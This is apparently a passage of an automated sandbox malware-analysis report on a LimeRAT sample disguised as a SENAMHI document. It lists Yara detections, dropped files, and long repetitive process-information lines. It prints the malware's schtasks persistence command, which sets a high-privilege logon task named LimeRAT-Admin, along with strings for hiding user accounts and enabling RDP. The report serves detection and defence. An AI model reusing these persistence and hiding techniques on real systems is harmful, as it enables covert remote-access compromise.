Source: Yara match File source: 00000010.00000002.80088120152.0000000002DA0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000000.79892756744.0000000000542000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000000.79892233843.0000000000542000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000002.80404784517.0000000000A22000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000000.80246486829.0000000000A22000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000000.79893250831.0000000000542000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.80311999722.0000000000542000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000000.80246995488.0000000000A22000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000000.79893776213.0000000000542000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.80316124713.0000000002B22000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: wtqsCpda..exe PID: 1033924, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: schtasks.exe PID: 1034124, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: chrome.exe PID: 1034204, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: chrome.exe PID: 6672, type: MEMORYSTR
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\chrome.exe, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\L2D128LW\Chrome[1].exe, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Roaming\wtqsCpda..exe, type: DROPPED
Uses schtasks.exe or at.exe to add and modify task schedules
Source: C:\Users\user\AppData\Roaming\wtqsCpda..exe Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /f /sc ONLOGON /RL HIGHEST /tn LimeRAT-Admin /tr "'C:\Users\user\AppData\Local\Temp\chrome.exe'"

Hooking and other Techniques for Hiding and Protection
barindex
Hides that the sample has been downloaded from the Internet (zone.identifier)
Source: C:\Users\user\AppData\Roaming\wtqsCpda..exe File opened: C:\Users\user\AppData\Local\Temp\chrome.exe:Zone.Identifier read attributes | delete
Contains functionality to hide user accounts
Source: DocumentoSENAMHI20222103.exe, 00000001.00000002.83503240355.00000000013B4000.00000002.00001000.00020000.00000000.sdmp String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
Source: DocumentoSENAMHI20222103.exe, 00000001.00000002.83503240355.00000000013B4000.00000002.00001000.00020000.00000000.sdmp String found in binary or memory: UEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEETermService%ProgramFiles%%windir%\System32%ProgramW6432%\Microsoft DN1\rfxvmt.dll\rdpwrap.ini\sqlmap.dllrudprpdpSOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserListSeDebugPrivilegeSYSTEM\CurrentControlSet\Services\TermService\ParametersServiceDllSYSTEM\CurrentControlSet\Services\TermServiceImagePathsvchost.exesvchost.exe -kCertPropSvcSessionEnvServicesActiveSYSTEM\CurrentControlSet\Control\Terminal ServerSYSTEM\CurrentControlSet\Control\Terminal Server\Licensing CoreSOFTWARE\Microsoft\Windows NT\CurrentVersion\WinlogonSYSTEM\CurrentControlSet\Control\Terminal Server\AddInsSYSTEM\CurrentControlSet\ControlTerminal Server\AddIns\Clip RedirectorSYSTEM\CurrentControlSet\Control\Terminal Server\AddIns\Dynamic VCfDenyTSConnectionsEnableConcurrentSessionsAllowMultipleTSSessionsRDPClipNameType
Source: DocumentoSENAMHI20222103.exe, 00000001.00000002.83505519609.0000000002FE0000.00000040.00001000.00020000.00000000.sdmp String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
Source: DocumentoSENAMHI20222103.exe, 00000001.00000002.83505519609.0000000002FE0000.00000040.00001000.00020000.00000000.sdmp String found in binary or memory: UEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEETermService%ProgramFiles%%windir%\System32%ProgramW6432%\Microsoft DN1\rfxvmt.dll\rdpwrap.ini\sqlmap.dllrudprpdpSOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserListSeDebugPrivilegeSYSTEM\CurrentControlSet\Services\TermService\ParametersServiceDllSYSTEM\CurrentControlSet\Services\TermServiceImagePathsvchost.exesvchost.exe -kCertPropSvcSessionEnvServicesActiveSYSTEM\CurrentControlSet\Control\Terminal ServerSYSTEM\CurrentControlSet\Control\Terminal Server\Licensing CoreSOFTWARE\Microsoft\Windows NT\CurrentVersion\WinlogonSYSTEM\CurrentControlSet\Control\Terminal Server\AddInsSYSTEM\CurrentControlSet\ControlTerminal Server\AddIns\Clip RedirectorSYSTEM\CurrentControlSet\Control\Terminal Server\AddIns\Dynamic VCfDenyTSConnectionsEnableConcurrentSessionsAllowMultipleTSSessionsRDPClipNameType
Source: DocumentoSENAMHI20222103.exe, 00000001.00000003.79799775147.000000000118E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
Source: DocumentoSENAMHI20222103.exe, 00000001.00000003.79799775147.000000000118E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: UEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEETermService%ProgramFiles%%windir%\System32%ProgramW6432%\Microsoft DN1\rfxvmt.dll\rdpwrap.ini\sqlmap.dllrudprpdpSOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserListSeDebugPrivilegeSYSTEM\CurrentControlSet\Services\TermService\ParametersServiceDllSYSTEM\CurrentControlSet\Services\TermServiceImagePathsvchost.exesvchost.exe -kCertPropSvcSessionEnvServicesActiveSYSTEM\CurrentControlSet\Control\Terminal ServerSYSTEM\CurrentControlSet\Control\Terminal Server\Licensing CoreSOFTWARE\Microsoft\Windows NT\CurrentVersion\WinlogonSYSTEM\CurrentControlSet\Control\Terminal Server\AddInsSYSTEM\CurrentControlSet\ControlTerminal Server\AddIns\Clip RedirectorSYSTEM\CurrentControlSet\Control\Terminal Server\AddIns\Dynamic VCfDenyTSConnectionsEnableConcurrentSessionsAllowMultipleTSSessionsRDPClipNameType
Source: DocumentoSENAMHI20222103.exe, 00000001.00000003.79809451868.000000000118E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
Source: DocumentoSENAMHI20222103.exe, 00000001.00000003.79809451868.000000000118E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: UEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEETermService%ProgramFiles%%windir%\System32%ProgramW6432%\Microsoft DN1\rfxvmt.dll\rdpwrap.ini\sqlmap.dllrudprpdpSOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserListSeDebugPrivilegeSYSTEM\CurrentControlSet\Services\TermService\ParametersServiceDllSYSTEM\CurrentControlSet\Services\TermServiceImagePathsvchost.exesvchost.exe -kCertPropSvcSessionEnvServicesActiveSYSTEM\CurrentControlSet\Control\Terminal ServerSYSTEM\CurrentControlSet\Control\Terminal Server\Licensing CoreSOFTWARE\Microsoft\Windows NT\CurrentVersion\WinlogonSYSTEM\CurrentControlSet\Control\Terminal Server\AddInsSYSTEM\CurrentControlSet\ControlTerminal Server\AddIns\Clip RedirectorSYSTEM\CurrentControlSet\Control\Terminal Server\AddIns\Dynamic VCfDenyTSConnectionsEnableConcurrentSessionsAllowMultipleTSSessionsRDPClipNameType
Source: DocumentoSENAMHI20222103.exe, 00000001.00000003.79810306933.000000000117A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
Source: DocumentoSENAMHI20222103.exe, 00000001.00000003.79810306933.000000000117A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: UEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEETermService%ProgramFiles%%windir%\System32%ProgramW6432%\Microsoft DN1\rfxvmt.dll\rdpwrap.ini\sqlmap.dllrudprpdpSOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserListSeDebugPrivilegeSYSTEM\CurrentControlSet\Services\TermService\ParametersServiceDllSYSTEM\CurrentControlSet\Services\TermServiceImagePathsvchost.exesvchost.exe -kCertPropSvcSessionEnvServicesActiveSYSTEM\CurrentControlSet\Control\Terminal ServerSYSTEM\CurrentControlSet\Control\Terminal Server\Licensing CoreSOFTWARE\Microsoft\Windows NT\CurrentVersion\WinlogonSYSTEM\CurrentControlSet\Control\Terminal Server\AddInsSYSTEM\CurrentControlSet\ControlTerminal Server\AddIns\Clip RedirectorSYSTEM\CurrentControlSet\Control\Terminal Server\AddIns\Dynamic VCfDenyTSConnectionsEnableConcurrentSessionsAllowMultipleTSSessionsRDPClipNameType
Source: DocumentoSENAMHI20222103.exe, 00000001.00000003.79799132484.000000000117E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
Source: DocumentoSENAMHI20222103.exe, 00000001.00000003.79799132484.000000000117E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: UEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEETermService%ProgramFiles%%windir%\System32%ProgramW6432%\Microsoft DN1\rfxvmt.dll\rdpwrap.ini\sqlmap.dllrudprpdpSOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserListSeDebugPrivilegeSYSTEM\CurrentControlSet\Services\TermService\ParametersServiceDllSYSTEM\CurrentControlSet\Services\TermServiceImagePathsvchost.exesvchost.exe -kCertPropSvcSessionEnvServicesActiveSYSTEM\CurrentControlSet\Control\Terminal ServerSYSTEM\CurrentControlSet\Control\Terminal Server\Licensing CoreSOFTWARE\Microsoft\Windows NT\CurrentVersion\WinlogonSYSTEM\CurrentControlSet\Control\Terminal Server\AddInsSYSTEM\CurrentControlSet\ControlTerminal Server\AddIns\Clip RedirectorSYSTEM\CurrentControlSet\Control\Terminal Server\AddIns\Dynamic VCfDenyTSConnectionsEnableConcurrentSessionsAllowMultipleTSSessionsRDPClipNameType
Source: C:\Users\user\AppData\Roaming\wtqsCpda..exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wtqsCpda..exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wtqsCpda..exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wtqsCpda..exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wtqsCpda..exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wtqsCpda..exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wtqsCpda..exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wtqsCpda..exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wtqsCpda..exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wtqsCpda..exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wtqsCpda..exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wtqsCpda..exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wtqsCpda..exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wtqsCpda..exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wtqsCpda..exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wtqsCpda..exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wtqsCpda..exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wtqsCpda..exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wtqsCpda..exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wtqsCpda..exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wtqsCpda..exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wtqsCpda..exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wtqsCpda..exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wtqsCpda..exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wtqsCpda..exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wtqsCpda..exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wtqsCpda..exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wtqsCpda..exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wtqsCpda..exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wtqsCpda..exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wtqsCpda..exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wtqsCpda..exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\chrome.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\chrome.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\chrome.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\chrome.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\chrome.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\chrome.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\chrome.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\chrome.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\chrome.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\chrome.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\chrome.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\chrome.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\chrome.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\chrome.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\chrome.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\chrome.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\chrome.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\chrome.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\chrome.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\chrome.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\chrome.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\chrome.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\chrome.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\chrome.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\chrome.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\chrome.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\chrome.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\chrome.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\chrome.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\chrome.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\chrome.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\chrome.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\chrome.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\chrome.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\chrome.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\chrome.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\chrome.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\chrome.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\chrome.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\chrome.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\chrome.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\chrome.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\chrome.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\chrome.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\chrome.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\chrome.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\chrome.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\chrome.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\chrome.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\chrome.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\chrome.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\chrome.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\chrome.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\chrome.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\chrome.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\chrome.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\chrome.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\chrome.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\chrome.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\chrome.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\chrome.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\chrome.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\chrome.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\chrome.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\chrome.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\chrome.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\chrome.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\chrome.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\chrome.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\chrome.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\chrome.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\chrome.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\chrome.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\chrome.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\chrome.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\chrome.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\chrome.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\chrome.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\chrome.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\chrome.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\chrome.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\chrome.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\chrome.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\chrome.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\chrome.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\chrome.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\chrome.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\chrome.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\chrome.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\chrome.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\chrome.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\chrome.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\chrome.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\chrome.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\chrome.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\chrome.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\chrome.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\chrome.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion
barindex
Yara detected LimeRAT
Source: Yara match File source: 15.0.wtqsCpda..exe.540000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 19.0.chrome.exe.a20000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 18.2.chrome.exe.760000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 18.0.chrome.exe.760000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.0.wtqsCpda..exe.540000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.wtqsCpda..exe.2b22c9c.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.0.wtqsCpda..exe.540000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 19.2.chrome.exe.a20000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 19.0.chrome.exe.a20000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 19.0.chrome.exe.a20000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.0.wtqsCpda..exe.540000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 19.0.chrome.exe.a20000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.wtqsCpda..exe.2b22c9c.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.wtqsCpda..exe.540000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000013.00000000.80248070314.0000000000A22000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000000.80097480691.0000000000762000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.80087663971.0000000002BB0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000002.83499752484.0000000000762000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000000.80247515540.0000000000A22000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.80088120152.0000000002DA0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000000.79892756744.0000000000542000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000000.79892233843.0000000000542000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000002.80404784517.0000000000A22000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000000.80246486829.0000000000A22000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000000.79893250831.0000000000542000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.80311999722.0000000000542000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000000.80246995488.0000000000A22000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000000.79893776213.0000000000542000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.80316124713.0000000002B22000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: wtqsCpda..exe PID: 1033924, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: schtasks.exe PID: 1034124, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: chrome.exe PID: 1034204, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: chrome.exe PID: 6672, type: MEMORYSTR
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\chrome.exe, type: DROPPED
